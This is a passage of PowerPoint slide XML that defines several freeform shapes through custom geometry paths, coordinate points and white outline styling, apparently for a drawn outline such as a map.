                      <a:pt x="14" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="45"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36213" name="Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2361" y="1236"/>
                <a:ext cx="32" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 32"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 16 w 32"/>
                  <a:gd name="T3" fmla="*/ 21 h 34"/>
                  <a:gd name="T4" fmla="*/ 9 w 32"/>
                  <a:gd name="T5" fmla="*/ 16 h 34"/>
                  <a:gd name="T6" fmla="*/ 4 w 32"/>
                  <a:gd name="T7" fmla="*/ 13 h 34"/>
                  <a:gd name="T8" fmla="*/ 3 w 32"/>
                  <a:gd name="T9" fmla="*/ 11 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 32"/>
                  <a:gd name="T11" fmla="*/ 1 h 34"/>
                  <a:gd name="T12" fmla="*/ 11 w 32"/>
                  <a:gd name="T13" fmla="*/ 0 h 34"/>
                  <a:gd name="T14" fmla="*/ 17 w 32"/>
                  <a:gd name="T15" fmla="*/ 3 h 34"/>
                  <a:gd name="T16" fmla="*/ 25 w 32"/>
                  <a:gd name="T17" fmla="*/ 9 h 34"/>
                  <a:gd name="T18" fmla="*/ 31 w 32"/>
                  <a:gd name="T19" fmla="*/ 16 h 34"/>
                  <a:gd name="T20" fmla="*/ 32 w 32"/>
                  <a:gd name="T21" fmla="*/ 28 h 34"/>
                  <a:gd name="T22" fmla="*/ 30 w 32"/>
                  <a:gd name="T23" fmla="*/ 33 h 34"/>
                  <a:gd name="T24" fmla="*/ 27 w 32"/>
                  <a:gd name="T25" fmla="*/ 34 h 3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32"/>
                  <a:gd name="T40" fmla="*/ 0 h 34"/>
                  <a:gd name="T41" fmla="*/ 32 w 32"/>
                  <a:gd name="T42" fmla="*/ 34 h 3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32" h="34">
                    <a:moveTo>
                      <a:pt x="27" y="34"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="34"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36214" name="Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="501" y="384"/>
                <a:ext cx="1401" cy="1832"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 681 w 1401"/>
                  <a:gd name="T1" fmla="*/ 994 h 1832"/>
                  <a:gd name="T2" fmla="*/ 1023 w 1401"/>
                  <a:gd name="T3" fmla="*/ 1782 h 1832"/>
                  <a:gd name="T4" fmla="*/ 839 w 1401"/>
                  <a:gd name="T5" fmla="*/ 1686 h 1832"/>
                  <a:gd name="T6" fmla="*/ 523 w 1401"/>
                  <a:gd name="T7" fmla="*/ 1665 h 1832"/>
                  <a:gd name="T8" fmla="*/ 214 w 1401"/>
                  <a:gd name="T9" fmla="*/ 1588 h 1832"/>
                  <a:gd name="T10" fmla="*/ 35 w 1401"/>
                  <a:gd name="T11" fmla="*/ 1362 h 1832"/>
                  <a:gd name="T12" fmla="*/ 158 w 1401"/>
                  <a:gd name="T13" fmla="*/ 977 h 1832"/>
                  <a:gd name="T14" fmla="*/ 253 w 1401"/>
                  <a:gd name="T15" fmla="*/ 993 h 1832"/>
                  <a:gd name="T16" fmla="*/ 523 w 1401"/>
                  <a:gd name="T17" fmla="*/ 1100 h 1832"/>
                  <a:gd name="T18" fmla="*/ 686 w 1401"/>
                  <a:gd name="T19" fmla="*/ 1056 h 1832"/>
                  <a:gd name="T20" fmla="*/ 713 w 1401"/>
                  <a:gd name="T21" fmla="*/ 988 h 1832"/>
                  <a:gd name="T22" fmla="*/ 805 w 1401"/>
                  <a:gd name="T23" fmla="*/ 1060 h 1832"/>
                  <a:gd name="T24" fmla="*/ 947 w 1401"/>
                  <a:gd name="T25" fmla="*/ 1042 h 1832"/>
                  <a:gd name="T26" fmla="*/ 814 w 1401"/>
                  <a:gd name="T27" fmla="*/ 1155 h 1832"/>
                  <a:gd name="T28" fmla="*/ 749 w 1401"/>
                  <a:gd name="T29" fmla="*/ 1321 h 1832"/>
                  <a:gd name="T30" fmla="*/ 934 w 1401"/>
                  <a:gd name="T31" fmla="*/ 1540 h 1832"/>
                  <a:gd name="T32" fmla="*/ 1008 w 1401"/>
                  <a:gd name="T33" fmla="*/ 1499 h 1832"/>
                  <a:gd name="T34" fmla="*/ 1060 w 1401"/>
                  <a:gd name="T35" fmla="*/ 1291 h 1832"/>
                  <a:gd name="T36" fmla="*/ 1187 w 1401"/>
                  <a:gd name="T37" fmla="*/ 1403 h 1832"/>
                  <a:gd name="T38" fmla="*/ 1263 w 1401"/>
                  <a:gd name="T39" fmla="*/ 1480 h 1832"/>
                  <a:gd name="T40" fmla="*/ 1351 w 1401"/>
                  <a:gd name="T41" fmla="*/ 1571 h 1832"/>
                  <a:gd name="T42" fmla="*/ 1124 w 1401"/>
                  <a:gd name="T43" fmla="*/ 1706 h 1832"/>
                  <a:gd name="T44" fmla="*/ 1214 w 1401"/>
                  <a:gd name="T45" fmla="*/ 1729 h 1832"/>
                  <a:gd name="T46" fmla="*/ 1248 w 1401"/>
                  <a:gd name="T47" fmla="*/ 1763 h 1832"/>
                  <a:gd name="T48" fmla="*/ 1194 w 1401"/>
                  <a:gd name="T49" fmla="*/ 1790 h 1832"/>
                  <a:gd name="T50" fmla="*/ 1209 w 1401"/>
                  <a:gd name="T51" fmla="*/ 1745 h 1832"/>
                  <a:gd name="T52" fmla="*/ 572 w 1401"/>
                  <a:gd name="T53" fmla="*/ 885 h 1832"/>
                  <a:gd name="T54" fmla="*/ 505 w 1401"/>
                  <a:gd name="T55" fmla="*/ 1038 h 1832"/>
                  <a:gd name="T56" fmla="*/ 382 w 1401"/>
                  <a:gd name="T57" fmla="*/ 928 h 1832"/>
                  <a:gd name="T58" fmla="*/ 1039 w 1401"/>
                  <a:gd name="T59" fmla="*/ 1210 h 1832"/>
                  <a:gd name="T60" fmla="*/ 1056 w 1401"/>
                  <a:gd name="T61" fmla="*/ 1036 h 1832"/>
                  <a:gd name="T62" fmla="*/ 937 w 1401"/>
                  <a:gd name="T63" fmla="*/ 988 h 1832"/>
                  <a:gd name="T64" fmla="*/ 846 w 1401"/>
                  <a:gd name="T65" fmla="*/ 794 h 1832"/>
                  <a:gd name="T66" fmla="*/ 906 w 1401"/>
                  <a:gd name="T67" fmla="*/ 803 h 1832"/>
                  <a:gd name="T68" fmla="*/ 1062 w 1401"/>
                  <a:gd name="T69" fmla="*/ 903 h 1832"/>
                  <a:gd name="T70" fmla="*/ 1178 w 1401"/>
                  <a:gd name="T71" fmla="*/ 1023 h 1832"/>
                  <a:gd name="T72" fmla="*/ 1250 w 1401"/>
                  <a:gd name="T73" fmla="*/ 1137 h 1832"/>
                  <a:gd name="T74" fmla="*/ 1181 w 1401"/>
                  <a:gd name="T75" fmla="*/ 1201 h 1832"/>
                  <a:gd name="T76" fmla="*/ 1179 w 1401"/>
                  <a:gd name="T77" fmla="*/ 1301 h 1832"/>
                  <a:gd name="T78" fmla="*/ 680 w 1401"/>
                  <a:gd name="T79" fmla="*/ 819 h 1832"/>
                  <a:gd name="T80" fmla="*/ 803 w 1401"/>
                  <a:gd name="T81" fmla="*/ 784 h 1832"/>
                  <a:gd name="T82" fmla="*/ 318 w 1401"/>
                  <a:gd name="T83" fmla="*/ 748 h 1832"/>
                  <a:gd name="T84" fmla="*/ 859 w 1401"/>
                  <a:gd name="T85" fmla="*/ 685 h 1832"/>
                  <a:gd name="T86" fmla="*/ 827 w 1401"/>
                  <a:gd name="T87" fmla="*/ 724 h 1832"/>
                  <a:gd name="T88" fmla="*/ 624 w 1401"/>
                  <a:gd name="T89" fmla="*/ 620 h 1832"/>
                  <a:gd name="T90" fmla="*/ 471 w 1401"/>
                  <a:gd name="T91" fmla="*/ 678 h 1832"/>
                  <a:gd name="T92" fmla="*/ 426 w 1401"/>
                  <a:gd name="T93" fmla="*/ 729 h 1832"/>
                  <a:gd name="T94" fmla="*/ 311 w 1401"/>
                  <a:gd name="T95" fmla="*/ 638 h 1832"/>
                  <a:gd name="T96" fmla="*/ 445 w 1401"/>
                  <a:gd name="T97" fmla="*/ 545 h 1832"/>
                  <a:gd name="T98" fmla="*/ 565 w 1401"/>
                  <a:gd name="T99" fmla="*/ 401 h 1832"/>
                  <a:gd name="T100" fmla="*/ 824 w 1401"/>
                  <a:gd name="T101" fmla="*/ 488 h 1832"/>
                  <a:gd name="T102" fmla="*/ 778 w 1401"/>
                  <a:gd name="T103" fmla="*/ 225 h 1832"/>
                  <a:gd name="T104" fmla="*/ 1036 w 1401"/>
                  <a:gd name="T105" fmla="*/ 10 h 1832"/>
                  <a:gd name="T106" fmla="*/ 1183 w 1401"/>
                  <a:gd name="T107" fmla="*/ 221 h 1832"/>
                  <a:gd name="T108" fmla="*/ 976 w 1401"/>
                  <a:gd name="T109" fmla="*/ 558 h 1832"/>
                  <a:gd name="T110" fmla="*/ 844 w 1401"/>
                  <a:gd name="T111" fmla="*/ 573 h 1832"/>
                  <a:gd name="T112" fmla="*/ 923 w 1401"/>
                  <a:gd name="T113" fmla="*/ 345 h 1832"/>
                  <a:gd name="T114" fmla="*/ 880 w 1401"/>
                  <a:gd name="T115" fmla="*/ 1238 h 1832"/>
                  <a:gd name="T116" fmla="*/ 904 w 1401"/>
                  <a:gd name="T117" fmla="*/ 1241 h 1832"/>
                  <a:gd name="T118" fmla="*/ 1359 w 1401"/>
                  <a:gd name="T119" fmla="*/ 1607 h 1832"/>
                  <a:gd name="T120" fmla="*/ 1395 w 1401"/>
                  <a:gd name="T121" fmla="*/ 1701 h 1832"/>
                  <a:gd name="T122" fmla="*/ 1298 w 1401"/>
                  <a:gd name="T123" fmla="*/ 1697 h 1832"/>
                  <a:gd name="T124" fmla="*/ 272 w 1401"/>
                  <a:gd name="T125" fmla="*/ 1680 h 183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01"/>
                  <a:gd name="T190" fmla="*/ 0 h 1832"/>
                  <a:gd name="T191" fmla="*/ 1401 w 1401"/>
                  <a:gd name="T192" fmla="*/ 1832 h 183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01" h="1832">
                    <a:moveTo>
                      <a:pt x="135" y="1559"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="1549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="1545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="1539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="1538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="1538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="1538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="1540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="1542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="1556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="1559"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1028" y="1104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1018" y="1104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1015" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1014" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1012" y="1087"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1014" y="1079"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1019" y="1067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024" y="1062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1034" y="1059"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1040" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1046" y="1068"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1046" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1046" y="1091"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1043" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1036" y="1102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028" y="1104"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="707" y="1051"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="702" y="1051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="1040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="1035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="999"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1041"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="1050"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="1051"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1172" y="1754"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1169" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="1749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="1747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="1745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1164" y="1713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1159" y="1707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="1707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1151" y="1709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="1708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1144" y="1704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1142" y="1703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1138" y="1709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1134" y="1715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1126" y="1738"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1107" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1104" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1103" y="1761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1082" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1064" y="1759"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1051" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1044" y="1765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028" y="1776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024" y="1778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="1782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1022" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1019" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1011" y="1792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="993" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="987" y="1791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="1793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="1797"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="1800"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="1804"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="1808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="1812"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="1816"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="1818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="1821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="1826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="934" y="1831"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="931" y="1832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="1831"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="1829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920" y="1825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920" y="1822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="1820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="926" y="1815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="929" y="1812"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="930" y="1808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="1803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="1797"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="1784"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="929" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="1739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="1735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="1733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="901" y="1731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="1728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="1727"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="894" y="1727"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="1722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="1718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="1707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="1690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="1683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="1685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="1692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="1691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="1691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="1690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="1689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="1689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="1685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="1690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="1689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="1687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="1683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="1683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="1685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="1678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="1676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="1677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="1672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="1667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="1655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="1655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="1659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="1666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="1665"/>
